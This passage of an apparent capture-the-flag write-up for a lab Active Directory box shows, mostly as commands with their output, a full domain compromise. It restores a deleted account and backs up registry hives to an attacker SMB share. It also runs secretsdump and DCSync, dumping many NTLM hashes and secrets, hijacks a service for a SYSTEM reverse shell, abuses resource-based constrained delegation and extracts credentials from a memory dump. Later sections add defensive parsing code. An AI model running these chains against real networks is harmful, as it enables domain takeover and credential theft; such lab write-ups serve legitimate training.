DisplayName                     :
DistinguishedName               : CN=Liza Kazanof\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=freelancer,DC=htb
dSCorePropagationData           : {12/31/1600 7:00:00 PM}
givenName                       : Liza
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : CN=Users,DC=freelancer,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
mail                            : liza.kazanof@freelancer.htb
memberOf                        : {CN=Remote Management Users,CN=Builtin,DC=freelancer,DC=htb, CN=Backup Operators,CN=Builtin,DC=freelancer,DC=htb}
Modified                        : 5/14/2024 6:41:44 PM
modifyTimeStamp                 : 5/14/2024 6:41:44 PM
msDS-LastKnownRDN               : Liza Kazanof
Name                            : Liza Kazanof
                                  DEL:ebe15df5-e265-45ec-b7fc-359877217138
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : ebe15df5-e265-45ec-b7fc-359877217138
objectSid                       : S-1-5-21-3542429192-2036945976-3483670807-2101
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133601998496583593
sAMAccountName                  : liza.kazanof
sDRightsEffective               : 0
sn                              : Kazanof
userAccountControl              : 512
userPrincipalName               : liza.kazanof@freelancer.com
uSNChanged                      : 544913
uSNCreated                      : 540822
whenChanged                     : 5/14/2024 6:41:44 PM
whenCreated                     : 5/14/2024 6:37:29 PM

Attempting to restore the object fails because of a naming conflict: another object with the same name, or more precisely the same distinguished name, already exists.

Get-ADObject -Filter 'samaccountname -eq "liza.kazanof"' -IncludeDeletedObjects | Restore-ADObject
An attempt was made to add an object to the directory with a name that is already in use
At line:1 char:84
+ ... untname -eq "liza.kazanof"' -IncludeDeletedObjects | Restore-ADObject
+                                                          ~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=Liza Kazanof...eelancer,DC=htb:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject

Both objects cannot coexist under the same name, so I need to provide a new name for the restored object by passing a value via -NewName to Restore-ADObject5. I use Liza and the object is restored successfully. Trying to use the hash to connect to the machine via nxc then fails because the password has expired, so I have to reset it.

nxc smb freelancer.htb -u 'liza.kazanof' -H '6bc05d2a5ebf34f5b563ff233199dc5a'
SMB         10.129.229.97   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.97   445    DC               [-] freelancer.htb\liza.kazanof:6bc05d2a5ebf34f5b563ff233199dc5a STATUS_PASSWORD_EXPIRED
 
impacket-smbpasswd -hashes :6bc05d2a5ebf34f5b563ff233199dc5a 'freelancer.htb/liza.kazanof@freelancer.htb'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================
 
New SMB password: 
Retype new SMB password: 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

With smbpasswd I set a new password for the account and can then log in with Helloworld123!.

evil-winrm -u 'liza.kazanof' -p 'Helloworld123!' -i freelancer.htb

Shell as Administrator

As already noted, the user liza.kazanof is in the Backup Operators group and can therefore be used to back up the registry hives (even remotely). With the help of reg.py from impacket I back up the SAM, SYSTEM and SECURITY hives onto my SMB share.

impacket-reg freelancer/liza.kazanof:'Helloworld123!'@dc.freelancer.htb \
             backup \
             -o \\\\10.10.10.10\\share
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.10.10.10\share\SAM.save
[*] Saved HKLM\SYSTEM to \\10.10.10.10\share\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.10.10.10\share\SECURITY.save

Then I can proceed to dump the hashes via secretsdump and use the administrator’s hash to get an interactive shell and collect the final flag.

impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Target system bootKey: 0x9db1404806f026092ec95ba23ead445b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:680c12d4ef693a3ae0fcd442c3b5874a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:1f36a3b5a23441f6054f56f97d29c3312ca75d6d7450912ea81648778b5e540c6f38ab1335f9b27f4c69646359f12f2358d272bc0de36d5a9073b2358f68f1873425130a4b88bd750a55f018f1a83d1108691f4757b92f3f1242147e656fe2e1c38e312d5f26f6d9377cb01a53c38d689a48f4c1fcb5320d06fd6c3184810ba49ec8197a0b14f8e9a06f7a83e68437412e57cfa5bc2aa78a782412c509c139cf2cd85efea4b1ea5cafbb1146bc3eb5431eda9feae2854e25c4d1f357d6dc2844c2b7b86325bdca5985873644bd0b3de57996d8e442cd5996e2206072b8e7e90c621bd4f4f67f52be774a578c2d515d31
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe20295f92e7e0bff2615bed48f0a0be7067e28f2
dpapi_userkey:0xbc3e1b600d881e1867b0bdfe6ec833e9743c07d7
[*] NL$KM 
 0000   D9 0B 60 A4 72 C3 B6 08  E4 F1 FF 54 62 91 65 66   ..`.r......Tb.ef
 0010   DE EE 19 17 58 31 12 CB  DF 25 18 D0 36 B0 C1 F4   ....X1...%..6...
 0020   1B 96 C3 5F 22 73 F0 D6  B9 81 2F 26 BA 69 6A FD   ..._"s..../&.ij.
 0030   7F C7 0B 87 71 BE D5 F5  8A 74 B4 3A BD AF DB 71   ....q....t.:...q
NL$KM:d90b60a472c3b608e4f1ff5462916566deee1917583112cbdf2518d036b0c1f41b96c35f2273f0d6b9812f26ba696afd7fc70b8771bed5f58a74b43abdafdb71
[*] _SC_MSSQL$SQLEXPRESS 
(Unknown User):v3ryS0l!dP@sswd#34
[*] Cleaning up...

With the hash of the machine account DC$ I can also dump the remaining hashes in the domain, because the machine account of a Domain Controller has the replication rights needed for DCSync by default.

impacket-secretsdump -hashes :89851d57d9c8cc8addb66c59b83a4379 'FREELANCER.HTB/DC$@dc.freelancer.htb'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d238e0bfa17d575038efc070187a91c2:::
freelancer.htb\mikasaAckerman:1105:aad3b435b51404eeaad3b435b51404ee:e8d62c7d57e5d74267ab6feb2f662674:::
sshd:1108:aad3b435b51404eeaad3b435b51404ee:c1e83616271e8e17d69391bdcd335ab4:::
SQLBackupOperator:1112:aad3b435b51404eeaad3b435b51404ee:c4b746db703d1af5575b5c3d69f57bab:::
sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
lorra199:1116:aad3b435b51404eeaad3b435b51404ee:c068bcc3c0dcd03cd84df5af2192ad8a:::
freelancer.htb\maya.artmes:1124:aad3b435b51404eeaad3b435b51404ee:22db50a324b9a34ea898a290c1284e25:::
freelancer.htb\michael.williams:1126:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
freelancer.htb\sdavis:1127:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\d.jones:1128:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jen.brown:1129:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\taylor:1130:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jmartinez:1131:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\olivia.garcia:1133:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\dthomas:1134:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\sophia.h:1135:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\Ethan.l:1138:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\wwalker:1141:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jgreen:1142:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\evelyn.adams:1143:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\hking:1144:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\alex.hill:1145:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\samuel.turner:1146:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\ereed:1149:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\leon.sk:1151:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
freelancer.htb\carol.poland:1160:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
freelancer.htb\lkazanof:1162:aad3b435b51404eeaad3b435b51404ee:a26c33c2878b23df8b2da3d10e430a0f:::
freelancer.com\liza.kazanof:2101:aad3b435b51404eeaad3b435b51404ee:c068bcc3c0dcd03cd84df5af2192ad8a:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::
DATACENTER-2019$:1115:aad3b435b51404eeaad3b435b51404ee:7a8b0efef4571ec55cc0b9f8cb73fdcf:::
DATAC2-2022$:1155:aad3b435b51404eeaad3b435b51404ee:007a710c0581c63104dad1e477c794e8:::
WS1-WIIN10$:1156:aad3b435b51404eeaad3b435b51404ee:57e57c6a3f0f8fff74e8ab524871616b:::
WS2-WIN11$:1157:aad3b435b51404eeaad3b435b51404ee:bf5267ee6236c86a3596f72f2ddef2da:::
WS3-WIN11$:1158:aad3b435b51404eeaad3b435b51404ee:732c190482eea7b5e6777d898e352225:::
DC2$:1159:aad3b435b51404eeaad3b435b51404ee:e1018953ffa39b3818212aba3f736c0f:::
SETUPMACHINE$:8601:aad3b435b51404eeaad3b435b51404ee:f5912663ecf2c8cbda2a4218127d11fe:::
[*] Kerberos keys grabbed
--- SNIP ---
[*] Cleaning up...

Unintended ways…

Server Operators

The user jmartinez is a member of the Server Operators group and is therefore able to modify services and to back up / restore files thanks to the SeBackup and SeRestore privileges6.

First I find services that run as LocalSystem and then replace the service binary of an unimportant service like VM3DService or VMTools with a malicious binary or script that grants a reverse shell as NT Authority\System.

# Find services running as LocalSystem
Get-WmiObject Win32_Service | Where-Object { $_.StartName -eq "LocalSystem" } | Select-Object Name, StartName
 
# Stop a service
sc.exe stop VM3DService
 
SERVICE_NAME: VM3DService
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
 
# Replace the binary
sc.exe config VM3DService binPath= "C:\tools\shell.bat"
[SC] ChangeServiceConfig SUCCESS
 
# Start the service again
sc.exe start VM3DService
[SC] StartService FAILED 1053:
 
The service did not respond to the start or control request in a timely fashion.

Instead of modifying services, I can also put the granted privileges to use directly. Besides the method shown with liza.kazanof, dumping the registry hives, the SeBackup and SeRestore privileges can also be used to bypass ACLs when accessing or copying files. A simple cp will not work though, because the file has to be opened with FILE_FLAG_BACKUP_SEMANTICS7. This can be achieved either with backup software like robocopy or with this PowerShell cmdlet.

Resource-Based Constrained Delegation

The user lorra199 has Generic Write on the Domain Controller's computer object and can therefore modify its attributes. The attack works by adding a new computer account to the domain (by default every authenticated user can add up to 10, governed by ms-DS-MachineAccountQuota) and then abusing the Generic Write to add that computer to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the Domain Controller. It is then possible to request a service ticket on behalf of the Administrator (or any other user) and use it to authenticate to the DC or simply dump all hashes via secretsdump.

impacket-addcomputer -computer-name 'RYUKI$' -computer-pass 'Helloworld123!' -dc-ip 10.129.229.97 'FREELANCER.HTB/lorra199:Helloworld123!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Successfully added machine account RYUKI$ with password Helloworld123!.
 
impacket-rbcd -delegate-from 'RYUKI$' -delegate-to 'DC$' -dc-ip 10.129.229.97 -action 'write' 'FREELANCER.HTB/lorra199:Helloworld123!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] RYUKI$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     RYUKI$       (S-1-5-21-3542429192-2036945976-3483670807-12101)
 
impacket-getST -spn CIFS/DC.freelancer.htb -impersonate Administrator -dc-ip 10.129.229.97 'FREELANCER/RYUKI$:Helloworld123!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_DC.freelancer.htb@FREELANCER.HTB.ccache
 
export KRB5CCNAME=Administrator@CIFS_DC.freelancer.htb@FREELANCER.HTB.ccache
 
impacket-wmiexec -no-pass -k dc.freelancer.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
freelancer\administrator
 
impacket-secretsdump -no-pass -k dc.freelancer.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x9db1404806f026092ec95ba23ead445b
--- SNIP ---
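
The msDS-AllowedToActOnBehalfOfOtherIdentity attribute that impacket-rbcd writes above is a binary, self-relative security descriptor, and the defensive check is to read that attribute on every Domain Controller (and any other Tier-0 computer object) and alert on any SID in its DACL. Added example, not code from the writeup or from impacket: a minimal parser for the descriptor, an audit function, and a builder used only to construct the test fixture. Fetching the blob itself (via LDAP or Get-ADComputer with that property) is assumed to have happened; the fixture uses the RYUKI$ SID from the output above.

```python
"""Audit msDS-AllowedToActOnBehalfOfOtherIdentity on Tier-0 computer objects.

The attribute holds a self-relative SECURITY_DESCRIPTOR whose DACL lists the
accounts allowed to impersonate users against the computer (S4U2Proxy). On a
Domain Controller it should be empty, so any SID found there is a finding.
The descriptor below is constructed locally instead of being read from LDAP.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF  # full-control mask (983551), the value impacket's rbcd writes


def sid_from_str(sid):
    """'S-1-5-21-...' -> binary SID: revision, count, 48-bit authority, subauthorities."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID string")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs))
            + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_to_str(data, off):
    """Decode the binary SID at `off`; returns (string form, byte length)."""
    rev, count = struct.unpack_from("<BB", data, off)
    authority = int.from_bytes(data[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_descriptor(delegate_sids, owner="S-1-5-32-544"):
    """Test fixture only: self-relative descriptor laid out as
    header | owner SID | DACL, with one ACCESS_ALLOWED ACE per delegate
    (no group, no SACL)."""
    aces = b""
    for sid in delegate_sids:
        sid_bytes = sid_from_str(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0,
                            8 + len(sid_bytes), FULL_CONTROL) + sid_bytes
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(delegate_sids), 0) + aces
    owner_bytes = sid_from_str(owner)
    owner_off = 20                       # fixed 20-byte descriptor header
    dacl_off = owner_off + len(owner_bytes)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)
    return header + owner_bytes + dacl


def parse_rbcd_descriptor(blob):
    """Return [{'sid', 'mask'}] for every ACCESS_ALLOWED ACE in the DACL."""
    rev, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", blob, 0)
    if rev != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative security descriptor")
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []                        # no DACL: nobody may delegate
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, dacl_off)
    off = dacl_off + 8
    entries = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", blob, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            (mask,) = struct.unpack_from("<I", blob, off + 4)
            sid, _ = sid_to_str(blob, off + 8)
            entries.append({"sid": sid, "mask": mask})
        off += ace_size                  # other ACE types are skipped by size
    return entries


def audit_rbcd(computer, blob, approved=()):
    """SIDs allowed to act on behalf of others against `computer` that are not
    on the approved list; for a Domain Controller that list is normally empty."""
    return [e["sid"] for e in parse_rbcd_descriptor(blob) if e["sid"] not in approved]


if __name__ == "__main__":
    # Constructed fixture resembling DC$'s attribute after the impacket-rbcd run
    # above; the RYUKI$ SID is taken from that output.
    ryuki = "S-1-5-21-3542429192-2036945976-3483670807-12101"
    for sid in audit_rbcd("DC$", build_rbcd_descriptor([ryuki])):
        print(f"[!] DC$: unexpected delegate in msDS-AllowedToActOnBehalfOfOtherIdentity: {sid}")
```

Resolving each reported SID back to an account name (here a freshly created computer with a RID far above the existing ones) and clearing the attribute is the remediation; lowering ms-DS-MachineAccountQuota to 0 removes the precondition described in the text.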

Attack Path

flowchart TD

subgraph "Initial access"
    A(Create Deactivated Employer Account) -->|Reset Password| B(Access as Employer)
    B -->|Modify ID in QR Access Code| C(Access as Admin)
    C -->|Interactive SQL Terminal| D(Impersonate sa in MSSQL)
end

subgraph "Execution"
    D -->|xp_cmdshell| E(Access as svc_sql)
end

subgraph "Privilege Escalation"
    E -->|Password Spray| F(Access as mikasaAckerman)
    F -->|Memory Dump Analysis| G(Hashes and Passwords)
    G -->|Password Spray| H(Access as lorra199)
    H -->|Restore Object from AD Recycle Bin| I(Access as liza.kazanof)
    G -->|Valid NTLM Hash| I
    I -->|"SeBackup Privilege\nDump Hashes from Registry"| J(Access as Administrator)
end

subgraph "Unintended"
    G -->|Password Spray with extended combinations| M(Access to 20 Accounts)
    M -->|Reset Password as Account Operator| P(Access as lorra199)
    M -->|Valid Password| N(Access as jmartinez)
    N -->|"Server Operators\nModifying service"| O(Access as NT Authority\System)
    P -->|"Generic Write on DC\nRBCD"| J
end

Addendum

Volatility

When the box was released, the memory dump could not be parsed with volatility3. Running it with the verbosity raised to at least 6 (-vvvvvv) showed that it tried to access a non-existent index while parsing the crash layer and therefore aborted. Wrapping the offending code in a try-except block works around that problem.

try:
    # Test the bit for the current page in the crash dump's page bitmap.
    if (buffer_char[bit_addr >> 3] >> (bit_addr & 0x7)) & 1:
        # Page is present: start a new run or extend the current one.
        if first_bit is None:
            first_offset = offset
            first_bit = bit_addr
        offset = offset + 0x1000
    else:
        # Page is absent: close the current run, if any, as one segment.
        if first_bit is not None:
            segment_length = (
                (bit_addr - 1) - first_bit + 1
            ) * 0x1000
            segments.append(
                (
                    first_bit * 0x1000,
                    first_offset,
                    segment_length,
                    segment_length,
                )
            )
            first_bit = None
except IndexError:
    # The bitmap is shorter than the header claims; skip the bit instead of aborting.
    continue

This was fixed properly in version 2.7.2 and therefore the same memory image can be parsed with a recent version of volatility3.
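To make the failure mode concrete, the following is an added example of my own (not volatility3's code and not from the write-up) that reimplements the same bitmap-to-segment walk with an explicit bounds check, so a bitmap that is shorter than its header claims raises a descriptive error before the loop starts instead of an IndexError halfway through. The names bitmap_to_segments, PAGE_SIZE and the sample bitmap are my own constructions.

```python
"""Bitmap-to-segment walk of the kind volatility3's crash-dump layer performs.

Added example, not code from volatility3 or from the write-up: it reimplements the
run-length walk over a page-presence bitmap (one bit per 4 KiB page, LSB-first in
each byte) with an up-front length check, so a truncated bitmap is reported as a
ValueError rather than surfacing as an IndexError inside the loop.
"""
from typing import List, Optional, Tuple

PAGE_SIZE = 0x1000

# (virtual start, file offset, mapped length, file length), as in the layer's segments
Segment = Tuple[int, int, int, int]


def bitmap_to_segments(bitmap: bytes, bit_count: int, data_offset: int) -> List[Segment]:
    """Translate a page-presence bitmap into contiguous (virtual, file) runs.

    bitmap      - one bit per page, LSB-first within each byte; bit set = page present
    bit_count   - number of bits the dump header claims the bitmap holds
    data_offset - file offset where the data of the first present page starts
    """
    # A header claiming more bits than the buffer holds is exactly the condition
    # that produced the IndexError described above; reject it with a clear message.
    needed = (bit_count + 7) // 8
    if len(bitmap) < needed:
        raise ValueError(
            f"bitmap truncated: header claims {bit_count} bits, buffer holds {len(bitmap) * 8}"
        )

    segments: List[Segment] = []
    offset = data_offset                 # file offset of the next present page's data
    first_bit: Optional[int] = None      # first page of the run currently being built
    first_offset = 0                     # file offset of that run's first page

    for bit_addr in range(bit_count):
        present = (bitmap[bit_addr >> 3] >> (bit_addr & 0x7)) & 1
        if present:
            if first_bit is None:
                first_bit, first_offset = bit_addr, offset
            offset += PAGE_SIZE
        elif first_bit is not None:
            # Run ended at the previous page: (bit_addr - first_bit) pages long.
            length = (bit_addr - first_bit) * PAGE_SIZE
            segments.append((first_bit * PAGE_SIZE, first_offset, length, length))
            first_bit = None

    # Close a run that extends to the very last bit of the bitmap.
    if first_bit is not None:
        length = (bit_count - first_bit) * PAGE_SIZE
        segments.append((first_bit * PAGE_SIZE, first_offset, length, length))
    return segments


if __name__ == "__main__":
    # Constructed sample: pages 1, 2, 8 and 15 present; page data begins at 0x2000.
    sample = bytes([0b00000110, 0b10000001])
    for seg in bitmap_to_segments(sample, 16, 0x2000):
        print("virt=0x%x file=0x%x len=0x%x" % (seg[0], seg[1], seg[2]))
```

Fixing the length check at the top rather than swallowing exceptions in the loop is the shape of a proper fix: a damaged or truncated dump is reported as such, while a run of present pages that reaches the end of the bitmap is still emitted.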

First I install volatility3 and the plugin pypykatz in a virtual environment.

# Create a new virtual environment
python3 -m venv venv
 
# Activate the venv
source venv/bin/activate
 
# Clone the repository
git clone https://github.com/volatilityfoundation/volatility3 && cd volatility3
 
# Install the requirements
pip install -r requirements.txt
 
# Install the plugin for pypykatz
git clone https://github.com/skelsec/pypykatz-volatility3
 
# Install the dependencies
pip install 'pypykatz>=0.3.3'

Then I use the plugins windows.lsadump, windows.cachedump, windows.hashdump, and pypykatz to dump the credentials from the memory dump.

python vol.py -f MEMORY.DMP windows.lsadump
--- SNIP ---
_SC_MSSQL$DATA  *PWN3D#l0rr@Armessa199  2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 57 00 4e 00 33 00 44 00 23 00 6c 00 30 00 72 00 72 00 40 00 41 00 72 00 6d 00 65 00 73 00 73 00 61 00 31 00 39 00 39 00 00 00 00 00 00 00
_SC_SQLTELEMETRY$DATA|Ñ¢[{vMA=UKÒ#Íq¼]¶ãqb{°*6L°00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5b 7b 76 86 4d 05 41 93 3d 55 4b d2 23 cd 71 09
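The hex column in the lsadump rows above is the decrypted secret blob: a 4-byte little-endian length, 12 bytes the tooling treats as opaque, the secret itself, then padding (the `_SC_MSSQL$DATA` row starts with `2a 00 00 00`, which is the 42-byte length of a 21-character UTF-16LE string). The following added example of my own (not the write-up's code and not volatility3's or Impacket's) parses that layout, recomputes the printable guess from the bytes instead of trusting the middle column, and flags non-text secrets like the `_SC_SQLTELEMETRY$DATA` row for manual review. The sample rows, the key name `_SC_ExampleSvc` and the password in them are constructed for this example.

```python
"""Decode the value column of a `windows.lsadump` row.

Added example, not code from the write-up, volatility3 or Impacket. The blob layout
(4-byte little-endian length, 12 opaque bytes, secret, padding) follows the
LSA_SECRET_BLOB structure that Impacket's secretsdump parses. Sample rows below are
constructed for this example, not copied from the box.
"""
import re
import struct
from typing import Optional, Tuple

HEADER_LEN = 16  # 4-byte length field + 12 bytes treated as opaque

# Trailing run of space-separated hex byte pairs at the end of a row.
HEX_RUN = re.compile(r"((?:[0-9a-fA-F]{2} )+[0-9a-fA-F]{2})\s*$")


def parse_lsa_secret_blob(blob: bytes) -> bytes:
    """Return the secret bytes carried by a decrypted LSA secret blob."""
    if len(blob) < HEADER_LEN:
        raise ValueError("blob shorter than the 16-byte header")
    (length,) = struct.unpack_from("<L", blob, 0)
    if HEADER_LEN + length > len(blob):
        raise ValueError(f"length field {length} exceeds blob size {len(blob)}")
    return blob[HEADER_LEN:HEADER_LEN + length]


def decode_secret(secret: bytes) -> Tuple[str, Optional[str]]:
    """Classify a secret as ('text', value) if it is ASCII-printable UTF-16LE, else ('binary', None).

    Heuristic: service and account passwords are stored as UTF-16LE; anything that
    does not decode to printable ASCII is left for manual review.
    """
    if len(secret) % 2:
        return "binary", None
    try:
        text = secret.decode("utf-16-le")
    except UnicodeDecodeError:
        return "binary", None
    if text and all(0x20 <= ord(c) <= 0x7E for c in text):
        return "text", text
    return "binary", None


def parse_lsadump_row(row: str) -> Tuple[str, str, Optional[str]]:
    """Split an lsadump row into (key name, kind, decoded value), trusting only the hex column."""
    key = row.split(maxsplit=1)[0]
    match = HEX_RUN.search(row)
    if not match:
        raise ValueError("no hex column found in row")
    blob = bytes.fromhex(match.group(1))
    kind, value = decode_secret(parse_lsa_secret_blob(blob))
    return key, kind, value


def build_blob(secret: bytes, pad: int = 6) -> bytes:
    """Construct a blob in the on-disk layout; used only to build the sample rows."""
    return struct.pack("<L", len(secret)) + b"\x00" * 12 + secret + b"\x00" * pad


def _hex(blob: bytes) -> str:
    return " ".join(f"{b:02x}" for b in blob)


# Constructed sample rows in lsadump's column layout: key, printable guess, hex bytes.
TEXT_ROW = "_SC_ExampleSvc$DATA\t(guess ignored)\t" + _hex(build_blob("Ex@mpleSvcP4ss".encode("utf-16-le")))
BINARY_ROW = "DPAPI_SYSTEM\t\u00d1\u00a2[{\t" + _hex(build_blob(bytes(range(0x80, 0xA0))))

if __name__ == "__main__":
    for row in (TEXT_ROW, BINARY_ROW):
        print(parse_lsadump_row(row))
```

A `_SC_<service>` secret is the logon password the Service Control Manager keeps for a service that runs as a domain or local account, so its presence in the LSA store is itself the finding: running the service under a group managed service account or a virtual account keeps that password out of LSA secrets and out of any memory image.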
 
python vol.py -f MEMORY.DMP windows.hashdump
Volatility 3 Framework 2.10.0
Progress:  100.00               PDB scanning finished                                
User    rid     lmhash  nthash
 
Administrator   500     aad3b435b51404eeaad3b435b51404ee        725180474a181356e53f4fe3dffac527
Guest   501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount  503     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount      504     aad3b435b51404eeaad3b435b51404ee        04fc56dd3ee3165e966ed04ea791d7a7
 
python3 vol.py -f MEMORY.DMP windows.cachedump
Volatility 3 Framework 2.10.0
Progress:  100.00               PDB scanning finished                                
Username        Domain  Domain name     Hash
 
Administrator   FREELANCER      FREELANCER.HTB  67 a0 c0 f1 93 ab d9 32 b5 5f b8 91 66 92 c3 61
lorra199        FREELANCER      FREELANCER.HTB  7c e8 08 b7 8e 75 a5 74 71 35 cf 53 dc 6a c3 b1
liza.kazanof    FREELANCER      FREELANCER.HTB  ec d6 e5 32 22 4c ca d2 ab cf 23 69 cc b8 b6 79
 
python vol.py -f MEMORY.DMP -p pypykatz-volatility3 pypykatz
Volatility 3 Framework 2.10.0
ERROR    pypykatz    : Failed to prcess TSPKG package! Reason: Page Fault at entry 0x0 in table page directory
 
credtype        domainname      username        NThash  LMHash  SHAHash masterkey       masterkey(sha1) key_guid        password
 
msv     Window Manager  DWM-1   1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
